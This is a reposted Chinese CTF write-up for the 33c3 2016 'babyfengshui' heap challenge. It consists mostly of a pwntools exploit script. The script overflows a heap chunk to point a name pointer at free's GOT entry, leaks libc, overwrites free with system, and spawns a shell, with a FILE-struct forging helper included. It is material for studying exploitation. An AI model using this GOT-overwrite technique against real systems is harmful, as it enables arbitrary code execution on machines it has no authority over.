标签：33c3 ru IO struct babyfengshui file sl 2016 p64

收获：篡改中间name数组的地址来泄露和攻击

from pwn import *
context.log_level = 'debug'
# context.arch = 'amd64'
libc = ELF('./libc-2.23.so')
file = './babyfengshui_33c3_2016'
elf = ELF(file)
shellcode = asm(shellcraft.sh())

local = 0
if local:
    io = process(file)
else:
    io = remote('node4.buuoj.cn',28340)

def debug():
    gdb.attach(io)

def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, b"\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, b"\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, b'\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, b"\x00")
    return file_struct

r = lambda : io.recv()
rx = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rud = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
li = lambda name,x : log.info(name+':'+hex(x))
shell = lambda : io.interactive()

def add(description_size,name,text_size,text):
    ru('Action: ')
    sl('0')
    ru('size of description: ')
    sl(str(description_size))
    ru('name: ')
    sl(name)
    ru('text length: ')
    sl(str(text_size))
    ru('text: ')
    sl(text)

def show(idx):
    ru('Action: ')
    sl('2')
    ru('index: ')
    sl(str(idx))

def edit(idx,text_size,text):
    ru('Action: ')
    sl('3')
    ru('index: ')
    sl(str(idx))
    ru('text length: ')
    sl(str(text_size))
    ru('text: ')
    sl(text)

def free(idx):
    ru('Action: ')
    sl('1')
    ru('index: ')
    sl(str(idx))

free_got = elf.got['free']
add(0x80,'aaa',20,'a') #0
add(0x20,'aaa',20,'a') #1
add(0x40,'/bin/sh\x00',20,'/bin/sh\x00') #2
free(0)
pay1 = 0x108*b'a' + p32(0x100) + p32(0x29) + p32(0)*9 + p32(0x89) + p32(free_got)
add(0x108,'aaa',len(pay1),pay1) #3
show(1)
free_addr = u32(ru('\xf7')[-4:])
li('free_addr',free_addr)
libcbase = free_addr - libc.sym['free']
li('libcbase',libcbase)
system = libcbase + libc.sym['system']
li('system',system)
edit(1,len(p32(system)),p32(system))
free(2)
shell()
#debug()

标签：33c3,ru,IO,struct,babyfengshui,file,sl,2016,p64
来源： https://www.cnblogs.com/lovezxy520/p/15850666.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。